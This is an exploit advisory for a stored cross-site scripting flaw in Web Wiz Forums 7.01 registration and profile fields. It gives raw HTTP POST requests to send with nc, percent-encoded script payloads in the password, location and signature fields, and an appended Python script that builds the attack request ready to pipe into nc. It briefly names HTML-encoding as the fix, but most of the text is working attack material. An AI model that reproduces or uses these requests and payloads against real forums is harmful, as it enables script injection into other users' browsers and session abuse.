Information :
°°°°°°°°°°°°
Language : ASP
Vulnerable version : Web Wiz Forums ver. 7.01 (and earlier ?)
Website : http://www.webwizforums.com
Problem : Persistent (stored) XSS

Objects :
°°°°°°°
- register_new_user.asp
- register.asp

The following form values are stored without being filtered or HTML-encoded:

  strLocation = Request.Form("location")
  strMessage  = Request.Form("signature")
  strPassword = Request.Form("password")

Because they are written back into the HTML unchanged, a value that starts with "> closes the attribute it sits in, and the <SCRIPT> tag that follows executes for whoever views the page.

Exploits :
°°°°°°°°
Send the registration/profile form with your payload in place of [CODE]. The fields are listed one per line below; in the real body they are joined with & (application/x-www-form-urlencoded), and the Content-Length header must equal the length of the encoded body you actually send (recompute it; the 290 below will not match a longer payload).

>nc target 80
POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0
Host: hack.microsoft.com
Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True
Content-type: application/x-www-form-urlencoded
Content-length: 290
Connection: keep-alive
Posting 290 bytes...

name=%5BHEX%5D
password=">[CODE]
password2=">[CODE]
email=support%40microsoft.com
emailShow=True
location=">[CODE]
homepage=http%3A%2F%2Fhex.net.ru
Login=True
ActiveUsers=False
signature=">[CODE]
countcharacters=28
Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF

P.S. The name value must match the nickname of the forum account whose cookie you send !!!

Example :
°°°°°°°°
>nc target 80
POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0
Host: hack.microsoft.com
Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True
Content-type: application/x-www-form-urlencoded
Content-length: 290
Connection: keep-alive
Posting 290 bytes...

name=%5BHEX%5D
password=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
password2=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
email=support%40microsoft.com
emailShow=True
location=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
homepage=http%3A%2F%2Fhex.net.ru
Login=True
ActiveUsers=False
signature=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
countcharacters=28
Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF

(The Submit value is the button caption "Зарегистрироваться", "Register", percent-encoded in cp1251.)

Patch/More Details :
°°°°°°°°°°°°°°°°°°
I had no opportunity to test this on versions 7.5 and 7.51 :(
Waiting for a reply from technical support at http://www.webwizforums.com ...
Until the vendor fixes it, HTML-encoding these values on output (Server.HTMLEncode) stops the injection.

[ Local time 21:50 | Cursed йцукен, how do people even live with it... ]
[ Copyright by [HEX] | mailto:hex@hex.net.ru ]
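As an added example (not the advisory's or Web Wiz's own code), the following Python builds the same POST from the fields above with a Content-Length that matches the body, reproduces the advisory's percent-encoding of the payload and of the cp1251 Submit caption, and contrasts the unfiltered rendering of a stored field with an HTML-encoded one (the classic-ASP equivalent of html.escape here is Server.HTMLEncode). The host, cookie and nickname are constructed placeholders.

```python
# Added example: reproduce the advisory's register_new_user.asp POST and show
# why the unfiltered profile fields give stored XSS. Not the advisory's code.
import html
from urllib.parse import urlencode

# The advisory's payload, decoded: closes the surrounding value="..." attribute
# and injects a script tag.
PAYLOAD = "\"><SCRIPT>ALERT('XSS atack by [HEX] (c) [CSL]')</SCRIPT>"
SUBMIT_LABEL = "Зарегистрироваться"  # the Submit button caption ("Register")


def profile_fields(nick, payload=PAYLOAD):
    """Form fields in the order the advisory posts them.  `nick` must be the
    nickname of the account whose cookie is sent with the request."""
    return [
        ("name", nick),
        ("password", payload),
        ("password2", payload),
        ("email", "support@microsoft.com"),
        ("emailShow", "True"),
        ("location", payload),
        ("homepage", "http://hex.net.ru"),
        ("Login", "True"),
        ("ActiveUsers", "False"),
        ("signature", payload),
        ("countcharacters", "28"),
        ("Submit", SUBMIT_LABEL),
    ]


def encode_body(fields, charset="cp1251"):
    """application/x-www-form-urlencoded: pairs joined with '&', space as '+',
    everything else outside [A-Za-z0-9_.-~] percent-encoded in `charset`."""
    return urlencode(fields, encoding=charset)


def build_request(host, cookie, fields,
                  path="/forum/register_new_user.asp?ForumID=0"):
    """Raw HTTP/1.0 request text, ready to pipe into nc.  The body is pure
    ASCII after encoding, so len(body) is the byte length."""
    body = encode_body(fields)
    headers = [
        f"POST {path} HTTP/1.0",
        f"Host: {host}",
        f"Cookie: {cookie}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",  # must equal the body actually sent
        "Connection: close",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


def render_unfiltered(value):
    """The vulnerable pattern: a stored Request.Form value written straight
    back into an attribute with no encoding."""
    return f'<input type="text" name="location" value="{value}">'


def render_encoded(value):
    """The fix: HTML-encode on output (Server.HTMLEncode in classic ASP)."""
    return f'<input type="text" name="location" value="{html.escape(value, quote=True)}">'


def attribute_broken_out(rendered):
    """True when the stored value terminated the attribute early, i.e. the
    markup that followed it is live HTML rather than attribute text."""
    return 'value="">' in rendered


if __name__ == "__main__":
    cookie = "ASPSESSIONIDQAQADDRS=CONSTRUCTED; Forum=UserID=CONSTRUCTED&Hide=True"
    print(build_request("forum.example", cookie, profile_fields("[HEX]")))
    print("unfiltered injects:", attribute_broken_out(render_unfiltered(PAYLOAD)))
    print("encoded injects:   ", attribute_broken_out(render_encoded(PAYLOAD)))
```

Pipe the returned request into nc as the advisory does; the name field still has to match the nickname behind the cookie you supply, and changing the payload changes the Content-Length, which build_request recomputes for you.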